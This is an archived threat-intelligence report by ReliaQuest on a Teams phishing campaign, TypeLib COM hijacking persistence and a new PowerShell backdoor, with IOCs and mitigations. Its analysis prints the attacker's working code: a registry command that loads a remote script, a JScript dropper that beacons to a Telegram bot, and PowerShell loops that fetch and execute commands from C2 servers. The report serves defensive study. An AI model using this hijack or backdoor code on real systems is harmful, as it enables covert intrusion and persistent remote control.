{
	"id": "bf81ce37-f366-4db0-afac-0ca84ca5e800",
	"created_at": "2026-04-06T00:14:58.235568Z",
	"updated_at": "2026-04-10T03:35:13.808398Z",
	"deleted_at": null,
	"sha1_hash": "1be08a7577799c8cefd2bd74320f259fa8434e5f",
	"title": "Threat Spotlight: Hijacked and Hidden: New Backdoor and Persistence Technique - ReliaQuest",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 660965,
	"plain_text": "Threat Spotlight: Hijacked and Hidden: New Backdoor and\r\nPersistence Technique - ReliaQuest\r\nBy ReliaQuest Threat Research Team 11 April 2025\r\nPublished: 2025-04-11 · Archived: 2026-04-05 20:27:56 UTC\r\nIn March 2025, while investigating multiple customer incidents, ReliaQuest uncovered an attack chain that began\r\nwith familiar tactics but quickly escalated into a novel persistence method that involved hijacking the Component\r\nObject Model Type Library.\r\nThe attack also included the deployment of a malware we hadn’t encountered before. It targeted customers in the\r\nfinance and professional, scientific, and technical services sectors.\r\nEarly tactics in the attack align with those of “Storm-1811” (aka “STAC5777”), a threat group known to deploy\r\n“Black Basta” ransomware. However, the later phases deviate from the norm, suggesting that the group may be\r\nevolving with new techniques or possibly splintering.\r\nAttribution aside, the attack provided some key insights into threat actors’ evolving tactics that enterprises need to\r\nknow. Read on to discover:\r\nThe adversary’s precise targeting patterns in their Microsoft Teams phishing attacks.\r\nA never-before-seen TypeLib hijacking technique that installs the novel malware.\r\nThe unique behaviors of the new backdoor and insights into its development.\r\nKey Points\r\nReliaQuest investigated a new Microsoft Teams phishing campaign using techniques previously deployed by\r\nBlack Basta operators. 
However, the follow-on attack introduced entirely new methods, suggesting either\r\nevolution within the group or fragmentation among its members.\r\nWe identified a previously unreported persistence method leveraging TypeLib COM hijacking plus a new\r\nPowerShell backdoor, highlighting ongoing attacker efforts to evade detection and maintain access to\r\ncompromised systems.\r\nTo defend against these tactics, organizations should restrict external communication in Microsoft Teams and\r\nharden Windows systems to prevent malicious execution.\r\nAttack Lifecycle\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 1 of 15\n\nFigure 1: Infection chain observed in the attacks we investigated\r\nPrecision Phishing: Exploiting Timing, Power, and Gender\r\nThe attacks kicked off with the adversary sending phishing messages to our customers’ employees via Microsoft\r\nTeams (see Figure 1). While we don’t know the contents of the messages, the attacker used the fraudulent\r\nMicrosoft 365 tenant “techsupport[at]sma5smg.sch[.]id” with the display name “Technical Support” to pose as a\r\nmember of IT staff. With this disguise, the recipients were almost certainly tricked into thinking IT support needed\r\naccess to their system to fix a problem.\r\nSo far, so run-of-the-mill. We’ve seen these techniques used before by Storm-1811. In May 2024, the group posed\r\nas IT help staff in . By October 2024, it shifted to phishing via , which bypassed traditional email security\r\ngateways and exploited employees’ trust in enterprise chat tools. This tactic became its go-to method. After\r\ngaining access, the group deployed remote monitoring and management (RMM) tools, which ultimately led to the\r\nBlack Basta ransomware being used to extort organizations.\r\nThe Storm-1811 threat group specializes in conducting social engineering to gain initial access to facilitate the\r\ndeployment of Black Basta ransomware. 
Black Basta handles the encryption and ransom demands, resulting in\r\ntwo distinct but complementary components of the attack chain.\r\nHowever, these latest attacks had some features that indicated they were calculated strikes designed to exploit\r\nspecific gaps:\r\nPerfect Timing: The phishing chats were carefully timed, landing between 2:00 p.m. and 3:00 p.m.,\r\nperfectly synced to the recipient organizations’ local time and coinciding with an afternoon slump in which\r\nemployees may be less alert in spotting malicious activity.[i]\r\nHigh-Value Targets: The attacker didn’t cast a wide net. They zeroed in on executive-level employees like\r\ndirectors and vice presidents—people who hold the power and access hackers crave but whose busy\r\nschedules may make them less vigilant.\r\nGender Stereotyping: Employees with female-sounding names were the exclusive targets, suggesting the\r\nattacker may have been banking on research into the demographics of phishing susceptibility to maximize\r\ntheir success rate.[ii]\r\nOnce the victim took the bait, the attacker manipulated the employee into launching a remote support session\r\nthrough Windows’ built-in “Quick Assist” tool. This approach reflects a broader trend we observed in 2024, where\r\nlegitimate tools were used in 60% of hands-on-keyboard incidents. Leveraging Quick Assist as their gateway, the\r\nattacker employed an unusual persistence method that also launched the novel malware variant.\r\nHijacking TypeLib: New Persistence Method\r\nBefore we dive into the attacker’s unusual persistence technique, let’s define a few terms.\r\nTerm: Component Object Model (COM)\r\nDefinition: The Microsoft technology Component Object Model (COM) lets software components talk\r\nto each other and share programs’ functionalities. 
Think of it this way: Instead of\r\ndeveloping a video decoder from scratch, a media player can use a prebuilt COM object,\r\nlike the \"mp4sdecd.dll\" file, to display MP4 videos. COM references these objects using\r\nunique Class Identifiers (CLSID). For example, the CLSID \"{2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2}\" points straight to that video decoder, making it easy for the media player\r\nto plug it in and get to work.\r\nTerm: COM hijacking\r\nDefinition: In COM hijacking, adversaries manipulate the Windows Registry by modifying a specific\r\nCLSID entry to redirect legitimate processes to malicious code. In the video decoder\r\nexample, hackers could tamper with the registry entry tied to the CLSID {2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2} so that it points to a malicious DLL instead of the real one.\r\nThey can even configure the registry to reference external files hosted on URLs, making it\r\neven easier to load malicious scripts or payloads. The result? When a media player or any\r\nother application tries to load the COM object, it unknowingly runs the malicious DLL or\r\nexternal file instead. This isn’t just a one-time attack—it’s built for persistence, staying\r\nactive even after system reboots.\r\nTerm: TypeLib hijacking\r\nDefinition: TypeLib, short for “Type Library,” acts as a blueprint for COM objects—it holds metadata\r\nabout their methods (e.g., “Play,” “Pause,” “Stop”) and interfaces, enabling applications to\r\ninteract with them seamlessly. In TypeLib hijacking, attackers modify registry entries to\r\nredirect legitimate COM objects to malicious scripts or files. As a result, every time an\r\napplication interacts with the hijacked COM object, the attacker’s code is executed instead.\r\nThis technique is designed for persistence, ensuring the attacker’s foothold remains active\r\nwhenever the application is used, all while leveraging legitimate system functionality for\r\nstealth.\r\nSo how did the technique play out? 
Once the attacker gained control of the employee’s device, they used the\r\nfollowing command to start the TypeLib hijacking process. We’ve annotated aspects of the command you should\r\npay attention to:\r\nreg add \"HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\\1.1\\0\\win64\" /t REG_SZ /d \"script:hxxps://drive.google[dot]com/uc?export=download^\u0026id=1l5cMkpY9HIERae03tqqvEzCVASQKen63\" /f\r\n1. This Windows Registry command (reg add) adds a new key-value pair or updates an existing one in the\r\nWindows Registry. It can alter system-level configurations or application-specific settings, depending on\r\nthe registry path targeted.\r\n2. The command targets the TypeLib registry hive, which stores metadata about COM objects, including their\r\nCLSIDs. In this case, it’s referencing the CLSID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, a\r\nkey identifier tied to Internet Explorer components.\r\n3. The command assigns a remote URL to the registry key's value, prefixed with the script: moniker. This\r\nCOM-specific feature directs the system to load and execute scripts from the specified remote location,\r\nenabling the execution of malicious code.\r\nAs a result of this command, the malware hosted on the Google Drive URL is downloaded and executed\r\nwhenever the hijacked COM object is accessed—whether by opening Internet Explorer, an application utilizing\r\nInternet Explorer components, or a system process indirectly invoking the COM functionality. 
To make matters\r\nworse, the Windows process “Explorer.exe” would reference this COM object every time it runs (see Figure 2),\r\nmeaning the malicious payload would be downloaded automatically on system restarts, ensuring the attacker’s\r\ncode stayed active and persistent, with the system doing all the work.\r\nFigure 2: Explorer.exe referencing the Internet Explorer COM object\r\nWe’ve seen security researchers[iii] demonstrate TypeLib hijacking as a practical proof of concept. We also\r\nobserved threat actors discussing the technique on cybercriminal forums. For instance, in October 2024, a user\r\nshared the same article we’ve cited here on the prominent Russian-language cybercriminal forum XSS, with most\r\nreplies expressing interest in the technique (see Figure 3). However, we hadn’t yet seen the technique play out in\r\nthe wild until we observed the attacks analyzed here.\r\nFigure 3: XSS users responding to TypeLib hijacking research\r\nBreaking Down the New PowerShell Backdoor\r\nOnce the TypeLib COM hijack is in place, a text file containing the malware (“5.txt”) is downloaded from the Google Drive\r\nURL. At the time of writing, the file has minimal malicious scoring on VirusTotal (see Figure 4),\r\nmeaning it could slip right under the radar without triggering any alarms in defensive software that relies on\r\nsignature-based detection, like an antivirus.\r\nFigure 4: Backdoor result on VirusTotal, showing low malicious scoring\r\nThe malware in the text file was packed with extensive “junk code”—non-functional content designed to throw\r\noff detection tools and analysis. 
This word salad contained several space-themed keywords like “Galaxy,”\r\n“Cosmos,” and “Orion.” The functional portion of the text file employs a unique, layered scripting approach in\r\nwhich PowerShell is wrapped with JScript code.\r\nExecution begins with JScript, which creates the PowerShell backdoor on disk. It writes the PowerShell\r\ncode, contained in the same text file, to the path “C:\\ProgramData\\kcnxrx.ps1” using the command “WriteLine,”\r\nas seen in the code below.\r\n\u003cscriptlet\u003e\r\n\u003cscript language=\"JScript\"\u003e\r\n// Drop path assembled in pieces; resolves to C:\\ProgramData\\kcnxrx.ps1\r\nvar extd = \"s1\";\r\nvar iiwjsp = \"C:\\\\ProgramData\\\\kcnxrx.p\" + extd;\r\n// gqvxvm is created in the omitted portion (assumed to be a Scripting.FileSystemObject, whose CreateTextFile is called here)\r\nvar ljbvbg = gqvxvm.CreateTextFile(iiwjsp, true);\r\nljbvbg.WriteLine(\u003cPowerShellCode\u003e)\r\n\u003c---snippet-----\u003e\r\nOnce the PowerShell file is created, the JScript code executes the file in a hidden window not displayed to the\r\nuser. PowerShell is launched with an execution-policy bypass (-ep bypass), so policies that block unauthorized or untrusted scripts do not stop the\r\nmalicious payload from running.\r\nLastly, the JScript code uses the “InstallProduct” method from the Windows Installer,[iv] which is intended to use MSI\r\nfiles to install programs. However, the code abuses this functionality to instead send an HTTP request to the\r\nattacker’s Telegram bot with a message (in this case, \"qwe1bsrr5\"). 
This is likely to inform the attacker that the\r\nscript executed successfully, and that command-and-control (C2) is established.\r\n\u003c---snippet-----\u003e\r\nljbvbg.Close();\r\n// Launch the dropped script through WMI with a hidden window (ShowWindow = 0) and the execution policy bypassed\r\nvar djvatt = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process\");\r\nvar hlrcuc = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_ProcessStartup\");\r\nvar zpoqok = hlrcuc.SpawnInstance_();\r\nzpoqok.ShowWindow = 0;\r\nvar kcbfwv = djvatt.Create('powershell.exe -ep bypass -file \"' + iiwjsp + '\"', null, zpoqok);\r\n// Abuse Windows Installer's InstallProduct to issue an HTTP request to the attacker's Telegram bot (UILevel 2 = no UI)\r\nvar skJJFkj = new ActiveXObject(\"windowsinstaller.installer\");\r\nskJJFkj.UILevel = 2;\r\nskJJFkj.InstallProduct(\"https://api[.]telegram[.]org/bot7963974508:AAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps/sendMessage?chat_id=7935143652\u0026text=qwe1bsrr5\");\r\n\u003c/script\u003e\r\n\u003c/scriptlet\u003e\r\nThe Telegram URL breaks down as follows:\r\n1. Bot Identifier: 7963974508\r\n2. Access Token: AAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps\r\n3. Chat ID: 7935143652\r\nThe PowerShell contained in the text file is obfuscated with junk code that has no functionality. 
Below, we’ve\r\nprovided a cleaned and condensed version for ease of readability.\r\n# 1. Build the beacon URL from the C: drive serial number (formatted as hex, then parsed back to an Int64)\r\n$gurynf = New-Object -Com \"Scripting.FileSystemObject\"\r\n$frtdtv = $gurynf.GetDrive(\"C:\").SerialNumber\r\n$frtdtv = \"{0:X}\" -f $frtdtv\r\n$frtdtv = [convert]::toint64($frtdtv, 16)\r\n$serial = $frtdtv\r\n$giezyzk = 'htt'\r\n$jikhdzg = 'p:/'\r\n$dsjvpni = '/18'\r\n$obhykml = '1.174'\r\n$felumga = '.164.'\r\n$ysapcoj = '180/'\r\n$ip = $giezyzk + $jikhdzg + $dsjvpni + $obhykml + $felumga + $ysapcoj\r\n$url = $ip + $serial\r\n# 2. HTTP client used to poll the C2\r\n$ryuuqj = New-Object Net.WebClient\r\n# 3. Poll forever: fetch whatever the C2 returns and execute it, retrying every 5 seconds\r\nwhile ($true) {\r\ntry {\r\n$pupcyw = $ryuuqj.DownloadString($url)\r\nInvoke-Expression $pupcyw\r\n} catch {\r\nStart-Sleep -Seconds 5\r\ncontinue\r\n}\r\nStart-Sleep -Seconds 5\r\n}\r\n# 4. Named mutex derived from the serial number\r\n$tdnumg = New-Object Threading.Mutex($false, $frtdtv)\r\n$tdnumg.WaitOne(1)\r\n$tdnumg.ReleaseMutex()\r\n$tdnumg.Dispose()\r\nWhen executed, the PowerShell performs the following actions:\r\n1. Constructs the C2 beacon URL with the infected device’s hard drive serial number ($ip+$serial) and\r\nconverts it to hexadecimal. This identifier is later referenced at the end of the C2 server URL\r\n(“181[.]174[.]164[.]180/Serial_ID”).\r\n2. Creates a WebClient object (Net.WebClient) for receiving commands or second-stage malware.\r\n3. Runs an infinite loop to download and execute provided commands or malware.\r\n4. Creates a Mutex derived from the infected system’s hard drive serial number to prevent the malware\r\nrunning multiple times and burning through system resources.\r\nFrom Bing Ads to Backdoors: The Rise of a New Threat\r\nWe dug into the attacker’s infrastructure and reviewed the PowerShell code to identify any potential overlaps with\r\nknown malware families. 
We found that the attacker has been developing versions of this malware since January\r\n2025, deploying early versions via malicious Bing advertisements.\r\nTelegram Bot Logs: We obtained a sample of the Telegram bot’s logs and uncovered some telling clues. Some\r\nlogs included syntax written in Russian, like “\u003cтекст_отправляемого_сообщения\u003e,” which translates to\r\n“\u003ctext_of_the_message_to_be_sent\u003e.” This indicates the malware developer is highly likely located in a Russian-speaking country. The chat logs also contained messages communicating live updates to the attacker on successful\r\ninfections. For example, one message contained the unique identifier “qwe1bsrr5” from the Telegram URL we\r\nreferenced earlier, indicating successful C2 on that host. For each compromised host, the bot fired off messages\r\nlike “qwe,” “qwe1,” and “qwe1calc”—totaling roughly 14 unique IDs and offering a glimpse of the attacker’s\r\ngrowing reach and the effectiveness of the new malware.\r\nCode Syntax: We conducted a search on VirusTotal for any malware that shares the same code syntax, such as\r\n“$ip+$serial.” We identified several versions, with the earliest being uploaded in January 2025, that had minimal\r\nfunctionality (see Figure 5). Some of the versions in February had the same features as the new malware we\r\ninvestigated but lacked obfuscation and had the C2 IP address of localhost (“$ip = hxxp://127.0.0[.]1”), which is\r\nhighly likely the adversary uploading early samples to check for malicious scoring on VirusTotal. This indicates\r\nthat development and testing for the malware likely began in February 2025.\r\nFigure 5: Early versions of the malware seen in VirusTotal.\r\nThese testing versions appear to have been uploaded by a single submitter in Latvia (see Figure 6). 
However,\r\naccording to internal chat logs from the Black Basta operators leaked in February 2025, group members use VPNs\r\nand route traffic through Latvia. Although these upload records may not reflect the developer’s true location, they\r\nmay be a sign of early detection testing by the author.\r\nFigure 6: Early version of the malware uploaded to VirusTotal by user shown as located in Latvia\r\nFamily Ties: Some versions of the malware uploaded in January 2025 reference separate C2 servers from the\r\nactive campaign (e.g., \"5.252.153[.]15\"). These versions have minimal functionality and obfuscation but share\r\nsignificant code overlap with the malware we were investigating, as seen in the PowerShell script “pas.ps1”\r\nbelow.\r\n$fso = New-Object -Com \"Scripting.FileSystemObject\"\r\n$SerialNumber = $fso.GetDrive(\"c:\\\").SerialNumber\r\n$SerialNumber = \"{0:X}\" -f $SerialNumber\r\n$SerialNumber = [convert]::toint64($SerialNumber,16)\r\n$serial = $SerialNumber\r\n$ip = 'http://5[.]252[.]153[.]15/'\r\n$url = $ip+$serial\r\n$s = New-Object System.Net.WebClient\r\nwhile ($true) {\r\ntry {\r\n$result=$s.DownloadString($url)\r\nInvoke-Expression $result\r\n} catch {\r\nStart-Sleep -s 5\r\ncontinue\r\n}\r\n}\r\nThis infrastructure and associated PowerShell malware were previously used in a malicious Bing advertisement\r\ncampaign, reported by security researchers[v] in January 2025. 
The Bing ads tricked users searching for Microsoft\r\nTeams software into downloading and running a malicious sideloaded DLL (TV.dll) along with a PowerShell-based\r\nmalware called \"Boxter.\" Given their significant overlaps, it is almost certain that this new malware is an\r\nevolution of Boxter and was deployed by the same adversaries responsible for the malicious Bing ads campaign in\r\nearly 2025. However, unlike the earlier campaign, the attacks used to deploy this new backdoor have no reported\r\nlinks to groups like Black Basta or Storm-1811. This indicates that it is realistically possible that a different group\r\nis responsible for the recent activity.\r\nKey Takeaways and What’s Next\r\nBecause ReliaQuest detected and responded to every attack attempt before impact occurred, we were unable to\r\ndiscover the attackers' affiliate relationships and ultimate goals. But there are a few possible conclusions we can\r\ndraw:\r\nThe Black Basta group adopted this new persistence method and malware for its attacks.\r\nOperators of the Black Basta ransomware group have splintered, with those who specialized in Microsoft\r\nTeams phishing and phone call techniques now collaborating with a different group that employs the new\r\nmethods described in this report.\r\nAn entirely different group has adopted the same initial access techniques that were previously used\r\nexclusively by Black Basta operators.\r\nWhether or not this Microsoft Teams phishing campaign was run by Black Basta, it’s clear that phishing through\r\nMicrosoft Teams isn’t going anywhere. Attackers keep finding clever ways to bypass defenses and stay inside\r\norganizations. 
This new malware highlights this ingenuity with its unique ability to be installed via TypeLib\r\nhijacking and to leverage multiple scripting languages for execution.\r\nStep Up Your Defenses\r\nYour Action Plan\r\nHere’s how to protect your organization from this campaign and any other attacks that use similar tactics:\r\nDisable external communication for Microsoft Teams to prevent phishing attacks targeting internal\r\nemployees. If external communication is required, use a whitelist for trusted domains. Ensure chat creation\r\nevents are being logged for Microsoft Teams to aid in detection and investigation.\r\nBlock “telegram[.]org” and “drive.google[.]com” at the network edge to prevent successful installation of\r\nthe malware involved in these incidents and disrupt C2 communications.\r\nDisable JScript via Group Policy or restrict it with AppLocker for departments and employees where it will\r\nnot disrupt operations, such as at the executive level.\r\nSet Windows Defender Application Control (WDAC) to the most restrictive level possible to enforce\r\nPowerShell's constrained language mode, limiting functions commonly exploited by malware.\r\nDisable Windows Script Host (WSH) via Group Policy to prevent scripts from being executed with\r\n\"wscript.exe\" or \"cscript.exe,\" blocking script-based malware that is downloaded and executed using the\r\n\"script:\" moniker. 
However, this change should be tested prior to deployment to ensure it does not disrupt\r\nsoftware or processes that rely on Windows Script Host.\r\nIOCs\r\nArtifact - Details\r\n181.174.164[.]180 - Malware C2 IP address\r\n130.195.221[.]182, 98.158.100[.]22 - Microsoft Teams phishing IP addresses\r\nf74fac3e5f7ebb092668dc16a9542799ccacc55412cfc6750d0f100b44eef898 - Malware hash (SHA-256)\r\ntechsupport[at]sma5smg.sch[.]id - Microsoft Teams phishing tenant\r\n(seven further 181.174.164[.]x addresses, list omitted) - Additional identified C2 infrastructure\r\n5.252.153[.]15, 5.252.153[.]241 - Malicious Bing ads C2 servers\r\n(hash list omitted) - Additional identified malware hashes based on “$ip+$serial” syntax\r\n[i] hxxps://hoxhunt[.]com/blog/top-3-phishing-attack-factors-time-desktop-mobile\r\n[ii] hxxps://lorrie.cranor[.]org/pubs/pap1162-sheng.pdf\r\n[iii] hxxps://cicada-8[.]medium[.]com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661\r\n[iv] hxxps://learn.microsoft[.]com/en-us/windows/win32/msi/downloading-an-installation-from-the-internet\r\n[v] hxxps://cybersecuritynews[.]com/fake-microsoft-teams-page-drops-malware-on-windows/\r\nHayden Evans is the primary author of this report.\r\nSource: 
https://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/"
	],
	"report_names": [
		"threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bc98fce-5e1c-46d8-9d1a-64b5cb5febc3",
			"created_at": "2025-04-23T02:00:55.20526Z",
			"updated_at": "2026-04-10T02:00:05.307504Z",
			"deleted_at": null,
			"main_name": "Storm-1811",
			"aliases": [
				"Storm-1811"
			],
			"source_name": "MITRE:Storm-1811",
			"tools": [
				"Black Basta",
				"Cobalt Strike",
				"Quick Assist",
				"BITSAdmin",
				"PsExec",
				"Impacket",
				"QakBot"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434498,
	"ts_updated_at": 1775792113,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.pdf",
		"text": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.txt",
		"img": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.jpg"
	}
}